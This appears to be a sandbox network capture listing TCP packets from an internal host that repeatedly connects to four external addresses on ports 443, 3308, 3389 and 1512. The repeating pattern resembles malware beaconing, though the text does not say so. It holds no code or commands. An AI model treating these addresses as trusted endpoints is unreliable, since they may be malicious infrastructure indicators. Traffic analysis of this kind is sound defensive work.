Jan 12, 2021 07:41:22.054280043 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.054393053 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.055471897 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.107640028 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.122325897 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.122575998 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.138478994 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.193036079 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.193278074 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.199501038 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.199774027 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.251925945 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.252120972 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.304411888 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.421963930 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.422091007 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.422266006 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.424398899 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.428448915 CET	49330	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:22.480793953 CET	443	49330	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:22.554178953 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.597723961 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.597868919 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.599299908 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.642371893 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.658452034 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.658493996 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.658631086 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.673480988 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.718445063 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.718640089 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.724426985 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.724662066 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.767810106 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.767982960 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.807822943 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.811239958 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.811259985 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.924206018 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.924258947 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:22.924470901 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.930155993 CET	49331	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:22.975105047 CET	3308	49331	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:23.050617933 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.105565071 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.105714083 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.106928110 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.160648108 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.182733059 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.182810068 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.182871103 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.182931900 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.192447901 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.253356934 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.253648043 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.261401892 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.261498928 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.315269947 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.315378904 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.354712963 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.369076967 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.369112968 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.460047960 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.460087061 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.460145950 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.460187912 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.464921951 CET	49332	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:23.518995047 CET	3389	49332	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:23.576009035 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.628889084 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.628984928 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.629885912 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.682641029 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.689620018 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.689651966 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.689707994 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.689779043 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.701980114 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.756165981 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.756531954 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.763278961 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.763545036 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.816251993 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.816524029 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.853027105 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.869360924 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.967094898 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.967144012 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:23.967403889 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:23.974257946 CET	49333	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:24.027147055 CET	1512	49333	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:24.094831944 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.146977901 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.147094965 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.148747921 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.200814962 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.215425014 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.215534925 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.222569942 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.276973963 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.277195930 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.287571907 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.287998915 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.339915991 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.340161085 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.378870010 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.392153025 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.512218952 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.512247086 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.512479067 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.518224955 CET	49334	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:24.570153952 CET	443	49334	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:24.640620947 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.683789015 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.683942080 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.685328960 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.728549004 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.739077091 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.739104033 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.739288092 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.755175114 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.800245047 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.800370932 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.810894012 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.811347961 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.854419947 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.854662895 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:24.895158052 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.897702932 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:24.897768021 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:25.010369062 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:25.010412931 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:25.010572910 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:25.014923096 CET	49335	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:25.058281898 CET	3308	49335	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:25.124222994 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.178493977 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.178612947 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.179305077 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.233055115 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.248720884 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.248753071 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.248843908 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.260446072 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.320636034 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.320836067 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.326939106 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.327052116 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.381073952 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.381331921 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.420646906 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.435194969 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.435241938 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.525455952 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.525484085 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.525686026 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.528624058 CET	49336	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:25.582715988 CET	3389	49336	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:25.634795904 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.687911034 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.687998056 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.688946009 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.741559982 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.748480082 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.748516083 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.748580933 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.748601913 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.755240917 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.809146881 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.809415102 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.813781023 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.813947916 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.866600990 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.866836071 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:25.905039072 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:25.919667959 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:26.020637035 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:26.020670891 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:26.020906925 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:26.024925947 CET	49337	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:26.077846050 CET	1512	49337	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:26.134175062 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.186764956 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.186981916 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.188126087 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.240273952 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.255388021 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.255459070 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.261971951 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.316636086 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.316873074 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.331667900 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.331913948 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.384107113 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.384398937 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.422813892 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.436638117 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.555834055 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.555912018 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.556020975 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.558279037 CET	49338	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:26.610447884 CET	443	49338	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:26.665750980 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.709177971 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.709328890 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.711239100 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.754422903 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.764993906 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.765012026 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.765098095 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.781362057 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.827193022 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.827382088 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.837338924 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.837730885 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.880911112 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.881160021 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:26.920170069 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.924441099 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:26.924465895 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:27.038512945 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:27.038566113 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:27.038724899 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:27.041953087 CET	49339	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:27.085078955 CET	3308	49339	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:27.149091005 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.203145027 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.203340054 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.204180956 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.258205891 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.274574041 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.274597883 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.274717093 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.282200098 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.342897892 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.343131065 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.349512100 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.349633932 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.403537035 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.403826952 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.442768097 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.457655907 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.457693100 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.549115896 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.549151897 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.549367905 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.551673889 CET	49340	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:27.605501890 CET	3389	49340	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:27.663495064 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.716312885 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.716415882 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.717286110 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.769970894 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.776753902 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.776776075 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.776945114 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.787064075 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.841082096 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.841366053 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.847865105 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.848053932 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.900762081 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.900872946 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:27.936914921 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.953665018 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:27.953691959 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:28.050628901 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:28.050653934 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:28.050713062 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:28.051213980 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:28.052926064 CET	49341	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:28.105839014 CET	1512	49341	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:28.162694931 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.214981079 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.215089083 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.216510057 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.268660069 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.283556938 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.283709049 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.304827929 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.359581947 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.359762907 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.366019964 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.366200924 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.418303013 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.418565989 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.454950094 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.470830917 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.470885992 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.590179920 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.590209961 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.590389013 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.592820883 CET	49342	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:28.645037889 CET	443	49342	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:28.708484888 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.751866102 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.752111912 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.752996922 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.796036005 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.807811022 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.807848930 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.807962894 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.821296930 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.867166042 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.867423058 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.873380899 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.873590946 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.916608095 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.916821003 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:28.956335068 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.959903002 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:28.959950924 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:29.072479963 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:29.072505951 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:29.072714090 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:29.075742960 CET	49343	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:29.118938923 CET	3308	49343	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:29.197922945 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.252213001 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.252414942 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.253762007 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.307996035 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.329163074 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.329183102 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.329294920 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.341427088 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.407228947 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.409440041 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.414714098 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.414902925 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.468703985 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.468872070 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.508649111 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.523037910 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.523070097 CET	3389	49344	5.100.228.233	192.168.2.22
